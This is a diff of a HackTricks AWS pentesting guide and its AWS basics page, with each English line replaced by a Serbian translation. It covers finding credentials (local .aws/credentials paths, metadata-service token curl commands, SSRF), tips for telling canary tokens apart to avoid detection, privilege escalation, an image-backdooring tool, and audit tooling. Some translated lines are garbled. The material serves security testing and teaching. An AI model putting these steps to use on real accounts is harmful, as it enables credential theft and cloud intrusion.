- **Društveno** inženjerstvo
- **Ponovna upotreba** lozinki (leakovi lozinki)
- Ranljivosti u AWS-hostovanim aplikacijama
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) sa pristupom metadata endpoint-u
- **Čitanje lokalnih fajlova**
- `/home/USERNAME/.aws/credentials`
- `C:\Users\USERNAME\.aws\credentials`
- 3rd party **provale**
- **Interni** zaposleni
- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)akreditivi
Or by **compromising an unauthenticated service** exposed:
Ili kompromitovanjem **neautentifikovane usluge** koja je izložena:
{{#ref}}
aws-unauthenticated-enum-access/
{{#endref}}
Or if you are doing a **review** you could just **ask for credentials** with these roles:
Ili ako radite **reviziju**, mogli biste jednostavno **tražiti akreditive** sa ovim rolama:
{{#ref}}
aws-permissions-for-a-pentest.md
{{#endref}}
> [!NOTE]
> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
> Nakon što ste uspeli da dobijete akreditive, treba da znate **kome ti akrediti pripadaju**, i **čemu imaju pristup**, tako da treba da izvršite neku osnovnu enumeraciju:
## Basic Enumeration
## Osnovna enumeracija
### SSRF
If you found a SSRF in a machine inside AWS check this page for tricks:
Ako ste pronašli SSRF na mašini unutar AWS-a, proverite ovu stranicu za trikove:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
@@ -72,8 +72,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
### Whoami
One of the first things you need to know is who you are (in where account you are in other info about the AWS env):
Jedna od prvih stvari koje treba da znate je ko ste (u kojem računu se nalazite i druge informacije o AWS okruženju):
```bash
# Easiest way, but might be monitored?
aws sts get-caller-identity
@@ -89,10 +88,9 @@ aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document
```
> [!CAUTION]
> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\
> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
> Imajte na umu da kompanije mogu koristiti **canary tokens** da identifikuju kada se **tokeni kradu i koriste**. Preporučuje se da proverite da li je token canary token ili ne pre nego što ga upotrebite.\
> Za više informacija [**proverite ovu stranicu**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
### Org Enumeration
@@ -102,30 +100,30 @@ aws-services/aws-organizations-enum.md
### IAM Enumeration
If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**.
Ako imate dovoljno dozvola, **proveravanje privilegija svake entiteta unutar AWS naloga** pomoći će vam da razumete šta vi i druge identitete možete da radite i kako da **povećate privilegije**.
If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\
Check **how to do the numeration and brute-forcing** in:
Ako nemate dovoljno dozvola da enumerišete IAM, možete **ukrasti brute-force** da ih otkrijete.\
Proverite **kako da uradite numeraciju i brute-forcing** u:
{{#ref}}
aws-services/aws-iam-enum.md
{{#endref}}
> [!NOTE]
> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
> In the following section you can check some ways to **enumerate some common services.**
> Sada kada **imate neke informacije o vašim kredencijalima** (i ako ste red tim, nadamo se da **niste otkriveni**). Vreme je da otkrijete koje se usluge koriste u okruženju.\
> U sledećem odeljku možete proveriti neke načine da **enumerišete neke uobičajene usluge.**
## Services Enumeration, Post-Exploitation & Persistence
AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
AWS ima neverovatnu količinu usluga, na sledećoj stranici naći ćete **osnovne informacije, enumeraciju** cheatsheets\*\*,\*\* kako da **izbegnete otkrivanje**, dobijete **persistence**, i druge **post-exploitation** trikove o nekima od njih:
{{#ref}}
aws-services/
{{#endref}}
Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools).
Imajte na umu da **ne** morate obavljati sav posao **ručno**, ispod u ovom postu možete pronaći **odeljak o** [**automatskim alatima**](./#automated-tools).
Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
Štaviše, u ovoj fazi možda ste otkrili **više usluga izloženih neautentifikovanim korisnicima**, možda ćete moći da ih iskoristite:
{{#ref}}
aws-unauthenticated-enum-access/
@@ -133,7 +131,7 @@ aws-unauthenticated-enum-access/
## Privilege Escalation
If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in:
Ako možete **proveriti barem svoje dozvole** nad različitim resursima, mogli biste **proveriti da li možete dobiti dodatne dozvole**. Trebalo bi da se fokusirate barem na dozvole navedene u:
{{#ref}}
aws-privilege-escalation/
@@ -141,10 +139,10 @@ aws-privilege-escalation/
## Publicly Exposed Services
While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
Dok enumerišete AWS usluge, možda ste pronašli neke od njih **koje izlažu elemente internetu** (VM/Containers portovi, baze podataka ili usluge čekanja, snimci ili kante...).\
Kao pentester/red tim, uvek biste trebali proveriti da li možete pronaći **osetljive informacije / ranjivosti** na njima, jer bi vam mogle pružiti **dalji pristup AWS nalogu**.
In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
U ovoj knjizi trebali biste pronaći **informacije** o tome kako pronaći **izložene AWS usluge i kako ih proveriti**. O tome kako pronaći **ranjivosti u izloženim mrežnim uslugama**, preporučujem vam da **pretražujete** specifičnu **uslugu** na:
{{#ref}}
https://book.hacktricks.xyz/
@@ -154,52 +152,49 @@ https://book.hacktricks.xyz/
### From the root/management account
When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account.
Kada menadžerski nalog kreira nove naloge u organizaciji, **nova uloga** se kreira u novom nalogu, po defaultu nazvana **`OrganizationAccountAccessRole`** i daje **AdministratorAccess** politiku menadžerskom nalogu da pristupi novom nalogu.
<figure><img src="../../images/image (171).png" alt=""><figcaption></figcaption></figure>
So, in order to access as administrator a child account you need:
Dakle, da biste pristupili kao administrator detetovom nalogu, potrebno je:
- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin.
- To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts`
- You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**.
- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary).
- **Kompromitovati** **menadžerski** nalog i pronaći **ID** **dečijih naloga** i **imena** **uloge** (OrganizationAccountAccessRole po defaultu) koja omogućava menadžerskom nalogu da pristupi kao admin.
- Da biste pronašli dečije naloge, idite na odeljak organizacija u aws konzoli ili pokrenite `aws organizations list-accounts`
- Ne možete direktno pronaći imena uloga, pa proverite sve prilagođene IAM politike i pretražujte bilo koju koja omogućava **`sts:AssumeRole` nad prethodno otkrivenim dečijim nalozima**.
- **Kompromitujte** **principal** u menadžerskom nalogu sa **`sts:AssumeRole` dozvolom nad ulogom u dečijim nalozima** (čak i ako nalog omogućava bilo kome iz menadžerskog naloga da se pretvara, kao što je eksterni nalog, specifične `sts:AssumeRole` dozvole su neophodne).
## Automated Tools
### Recon
- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby.
- [**aws-recon**](https://github.com/darkbitio/aws-recon): Alat za **prikupljanje inventara** fokusiran na AWS sigurnost, pisan u Ruby-ju.
```bash
# Install
gem install aws_recon
# Recon and get json
AWS_PROFILE=<profile> aws_recon \
--services S3,EC2 \
--regions global,us-east-1,us-east-2 \
--verbose
--services S3,EC2 \
--regions global,us-east-1,us-east-2 \
--verbose
```
- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues.
- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist je **alat za više oblaka za dobijanje resursa** (domaćinska imena, IP adrese) od provajdera oblaka.
- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper vam pomaže da analizirate svoja okruženja Amazon Web Services (AWS). Sada sadrži mnogo više funkcionalnosti, uključujući reviziju za bezbednosne probleme.
```bash
# Installation steps in github
# Create a config.json file with the aws info, like:
{
"accounts": [
{
"default": true,
"id": "<account id>",
"name": "dev"
}
],
"cidrs":
{
"2.2.2.2/28": {"name": "NY Office"}
}
"accounts": [
{
"default": true,
"id": "<account id>",
"name": "dev"
}
],
"cidrs":
{
"2.2.2.2/28": {"name": "NY Office"}
}
}
# Enumerate
@@ -229,9 +224,7 @@ python3 cloudmapper.py public --accounts dev
python cloudmapper.py prepare #Prepare webserver
python cloudmapper.py webserver #Show webserver
```
- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
- [**cartography**](https://github.com/lyft/cartography): Cartography je Python alat koji konsoliduje infrastrukturne resurse i odnose između njih u intuitivnom grafičkom prikazu koji pokreće Neo4j baza podataka.
```bash
# Install
pip install cartography
@@ -240,17 +233,15 @@ pip install cartography
# Get AWS info
AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j
```
- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
- [**starbase**](https://github.com/JupiterOne/starbase): Starbase prikuplja resurse i odnose iz usluga i sistema uključujući cloud infrastrukturu, SaaS aplikacije, bezbednosne kontrole i još mnogo toga u intuitivnom grafičkom prikazu podržanom od strane Neo4j baze podataka.
- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Koristi python2) Ovo je alat koji pokušava da **otkrije sve** [**AWS resurse**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) kreirane u nalogu.
- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): To je alat za **preuzimanje svih javnih IP adresa** (i IPv4/IPv6) povezanih sa AWS nalogom.
### Privesc & Exploiting
- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
- Note that pacu **only checks your own privescs paths** (not account wide).
- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Otkrijte najprivilegovanije korisnike u skeniranoj AWS sredini, uključujući AWS Shadow Admins. Koristi powershell. Možete pronaći **definiciju privilegovanih politika** u funkciji **`Check-PrivilegedPolicy`** u [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu je open-source **AWS exploitation framework**, dizajniran za ofanzivno testiranje bezbednosti protiv cloud okruženja. Može **enumerisati**, pronaći **pogrešne konfiguracije** i **iskoristiti** ih. Možete pronaći **definiciju privilegovanih dozvola** u [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) unutar **`user_escalation_methods`** rečnika.
- Imajte na umu da pacu **samo proverava vaše vlastite privesc puteve** (ne na nivou celog naloga).
```bash
# Install
## Feel free to use venvs
@@ -264,9 +255,7 @@ pacu
> exec iam__enum_permissions # Get permissions
> exec iam__privesc_scan # List privileged permissions
```
- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) je skripta i biblioteka za identifikaciju rizika u konfiguraciji AWS Identity and Access Management (IAM) za AWS nalog ili AWS organizaciju. Modeluje različite IAM korisnike i uloge u nalogu kao usmereni graf, što omogućava provere za **privilege escalation** i za alternativne puteve koje napadač može da preuzme kako bi dobio pristup resursu ili akciji u AWS-u. Možete proveriti **permissions used to find privesc** puteve u datotekama koje se završavaju sa `_edges.py` u [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
```bash
# Install
pip install principalmapper
@@ -288,10 +277,8 @@ pmapper --profile dev query 'preset privesc *' # Get privescs with admins
pmapper --profile dev orgs create
pmapper --profile dev orgs display
```
- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use).
- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining je alat za procenu bezbednosti AWS IAM koji identifikuje kršenja principa minimalnih privilegija i generiše izveštaj u HTML formatu sa prioritetom rizika.\
Prikazaće vam potencijalno **previše privilegovanog** korisnika, inline i aws **politike** i koji **principali imaju pristup njima**. (Ne proverava samo privesc već i druge vrste zanimljivih dozvola, preporučuje se korišćenje).
```bash
# Install
pip install cloudsplaining
@@ -303,24 +290,20 @@ cloudsplaining download --profile dev
# Analyze the IAM policies
cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
```
- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack procenjuje AWS naloge na **ranjivosti u otimanju poddomena** kao rezultat odvojenih konfiguracija Route53 i CloudFront.
- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): Lista ECR repozitorijuma -> Preuzmi ECR repozitorijum -> Uvedi backdoor -> Pomerite backdoor-ovanu sliku
- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag je alat koji **pretražuje** javne Elastic Block Storage (**EBS**) snimke za tajne koje su možda slučajno ostavljene.
### Audit
- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins).
- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit od Aqua je projekat otvorenog koda dizajniran da omogući otkrivanje **bezbednosnih rizika u cloud infrastrukturi** naloga, uključujući: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI) i GitHub (ne traži ShadowAdmins).
```bash
./index.js --csv=file.csv --console=table --config ./config.js
# Compiance options: --compliance {hipaa,cis,cis1,cis2,pci}
## use "cis" for cis level 1 and 2
```
- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler je alat otvorenog koda za procenu najboljih praksi bezbednosti AWS-a, revizije, odgovor na incidente, kontinuirano praćenje, učvršćivanje i spremnost za forenziku.
```bash
# Install python3, jq and git
# Install
@@ -331,15 +314,11 @@ prowler -v
prowler <provider>
prowler aws --profile custom-profile [-M csv json json-asff html]
```
- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. Its an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox vam pomaže da steknete situacionu svest u nepoznatim cloud okruženjima. To je alat otvorenog koda za komandnu liniju kreiran da pomogne pentesterima i drugim profesionalcima u ofanzivnoj bezbednosti da pronađu iskoristive napadne puteve u cloud infrastrukturi.
```bash
cloudfox aws --profile [profile-name] all-checks
```
- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite je alat za reviziju bezbednosti otvorenog koda za više oblaka, koji omogućava procenu bezbednosnog stanja oblaka.
```bash
# Install
virtualenv -p python3 venv
@@ -350,18 +329,16 @@ scout --help
# Get info
scout aws -p dev
```
- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (koristi python2.7 i izgleda neodržavano)
- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus je moćan alat za AWS EC2 / S3 / CloudTrail / CloudWatch / KMS najbolje prakse učvršćivanja (izgleda neodržavano). Proverava samo podrazumevane konfiguracije kredencijala unutar sistema.
- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
### Kontinuirana Revizija
### Constant Audit
- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
## DEBUG: Capture AWS cli requests
- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian je motor pravila za upravljanje javnim cloud računima i resursima. Omogućava korisnicima da **definišu politike za omogućavanje dobro upravljane cloud infrastrukture**, koja je i sigurna i optimizovana za troškove. Konsoliduje mnoge ad-hoc skripte koje organizacije imaju u lagan i fleksibilan alat, sa jedinstvenim metrikama i izveštavanjem.
- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** je platforma za **kontinuirano praćenje usklađenosti, izveštavanje o usklađenosti i automatizaciju bezbednosti za cloud**. U PacBot-u, bezbednosne i usklađene politike se implementiraju kao kod. Svi resursi otkriveni od strane PacBot-a se ocenjuju prema ovim politikama kako bi se procenila usklađenost sa politikama. PacBot **auto-fix** okvir pruža mogućnost automatskog odgovora na kršenja politika preduzimanjem unapred definisanih akcija.
- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert je serverless, **real-time** okvir za analizu podataka koji vam omogućava da **prikupljate, analizirate i obaveštavate** o podacima iz bilo kog okruženja, **koristeći izvore podataka i logiku obaveštavanja koju definišete**. Timovi za računarstvo bezbednosti koriste StreamAlert da skeniraju terabajte log podataka svakog dana za otkrivanje incidenata i odgovor na njih.
## DEBUG: Zabeleži AWS cli zahteve
```bash
# Set proxy
export HTTP_PROXY=http://localhost:8080
@@ -380,14 +357,9 @@ export AWS_CA_BUNDLE=~/Downloads/certificate.pem
# Run aws cli normally trusting burp cert
aws ...
```
## References
## Reference
- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
- [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/)
{{#include ../../banners/hacktricks-training.md}}

378
src/pentesting-cloud/aws-security/aws-basic-information/README.md
View File

@@ -1,331 +1,321 @@
# AWS - Basic Information
# AWS - Osnovne Informacije
{{#include ../../../banners/hacktricks-training.md}}
## Organization Hierarchy
## Hijerarhija Organizacije
![](<../../../images/image (151).png>)
### Accounts
### Računi
In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them.
U AWS-u postoji **root račun**, koji je **glavni kontejner za sve račune** vaše **organizacije**. Međutim, ne morate koristiti taj račun za implementaciju resursa, možete kreirati **druge račune kako biste odvojili različite AWS** infrastrukture između njih.
This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments.
To je veoma zanimljivo sa **bezbednosnog** stanovišta, jer **jedan račun neće moći da pristupi resursima drugog računa** (osim ako su mostovi posebno kreirani), tako da na ovaj način možete postaviti granice između implementacija.
Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts.
Stoga, postoje **dva tipa računa u organizaciji** (govorimo o AWS računima, a ne o korisničkim računima): jedan jedini račun koji je označen kao račun za upravljanje, i jedan ili više članova računa.
- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following:
- **Račun za upravljanje (root račun)** je račun koji koristite za kreiranje organizacije. Iz računa za upravljanje organizacijom, možete uraditi sledeće:
- Create accounts in the organization
- Invite other existing accounts to the organization
- Remove accounts from the organization
- Manage invitations
- Apply policies to entities (roots, OUs, or accounts) within the organization
- Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization.
- It's possible to login as the root user using the email and password used to create this root account/organization.
- Kreirati račune u organizaciji
- Pozvati druge postojeće račune u organizaciju
- Ukloniti račune iz organizacije
- Upravljati pozivnicama
- Primeni politike na entitete (root, OU ili račune) unutar organizacije
- Omogućiti integraciju sa podržanim AWS uslugama kako bi se obezbedila funkcionalnost usluga širom svih računa u organizaciji.
- Moguće je prijaviti se kao root korisnik koristeći email i lozinku korišćene za kreiranje ovog root računa/organizacije.
The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account.
- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account.
- Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it).
Račun za upravljanje ima **odgovornosti računa za plaćanje** i odgovoran je za plaćanje svih troškova koje generišu članovi računi. Ne možete promeniti račun za upravljanje organizacijom.
- **Članovi računi** čine sve ostale račune u organizaciji. Račun može biti član samo jedne organizacije u isto vreme. Možete prikačiti politiku na račun kako biste primenili kontrole samo na taj jedan račun.
- Članovi računi **moraju koristiti važeću email adresu** i mogu imati **ime**, generalno neće moći da upravljaju naplatom (ali im može biti dat pristup tome).
```
aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com
```
### **Organizacione jedinice**
### **Organization Units**
Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children.
Računi se mogu grupisati u **organizacione jedinice (OU)**. Na ovaj način, možete kreirati **politike** za organizacionu jedinicu koje će biti **primenjene na sve podračune**. Imajte na umu da OU može imati druge OU kao decu.
```bash
# You can get the root id from aws organizations list-roots
aws organizations create-organizational-unit --parent-id r-lalala --name TestOU
```
### Service Control Policy (SCP)
A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**.
**Politika kontrole usluga (SCP)** je politika koja specificira usluge i akcije koje korisnici i uloge mogu koristiti u nalozima na koje SCP utiče. SCP-ovi su **slični IAM** politikama dozvola osim što **ne dodeljuju nikakve dozvole**. Umesto toga, SCP-ovi specificiraju **maksimalne dozvole** za organizaciju, organizacionu jedinicu (OU) ili nalog. Kada prikačite SCP na koren vaše organizacije ili na OU, **SCP ograničava dozvole za entitete u članicama naloga**.
This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\
The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked).
Ovo je JEDINI način na koji **čak i korisnik sa root privilegijama može biti sprečen** da uradi nešto. Na primer, može se koristiti da se spreči korisnike da onemoguće CloudTrail ili obrišu rezervne kopije.\
Jedini način da se to zaobiđe je da se kompromituje i **glavni nalog** koji konfiguriše SCP-ove (glavni nalog ne može biti blokiran).
> [!WARNING]
> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account.
> Imajte na umu da **SCP-ovi samo ograničavaju principe u nalogu**, tako da drugi nalozi nisu pogođeni. To znači da imati SCP koji odbija `s3:GetObject` neće sprečiti ljude da **pristupaju javnom S3 bucket-u** u vašem nalogu.
SCP examples:
Primeri SCP-a:
- Deny the root account entirely
- Only allow specific regions
- Only allow white-listed services
- Deny GuardDuty, CloudTrail, and S3 Public Block Access from
- Odbijanje glavnog naloga u potpunosti
- Dozvoliti samo specifične regione
- Dozvoliti samo usluge sa bele liste
- Odbijanje GuardDuty, CloudTrail i S3 javnog blokiranja pristupa od
being disabled
biti onemogućeni
- Deny security/incident response roles from being deleted or
- Odbijanje uloga za bezbednost/odgovor na incidente od
modified.
biti obrisane ili
- Deny backups from being deleted.
- Deny creating IAM users and access keys
modifikovane.
Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
- Odbijanje brisanja rezervnih kopija.
- Odbijanje kreiranja IAM korisnika i pristupnih ključeva
Pronađite **JSON primere** u [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
### ARN
**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this:
**Amazon Resource Name** je **jedinstveno ime** koje svaki resurs unutar AWS-a ima, sastoji se ovako:
```
arn:partition:service:region:account-id:resource-type/resource-id
arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
```
Note that there are 4 partitions in AWS but only 3 ways to call them:
Napomena da postoje 4 particije u AWS-u, ali samo 3 načina da ih pozovete:
- AWS Standard: `aws`
- AWS China: `aws-cn`
- AWS US public Internet (GovCloud): `aws-us-gov`
- AWS US javni Internet (GovCloud): `aws-us-gov`
- AWS Secret (US Classified): `aws`
## IAM - Identity and Access Management
## IAM - Upravljanje identitetom i pristupom
IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
IAM je usluga koja će vam omogućiti da upravljate **autentifikacijom**, **autorizacijom** i **kontrolom pristupa** unutar vašeg AWS naloga.
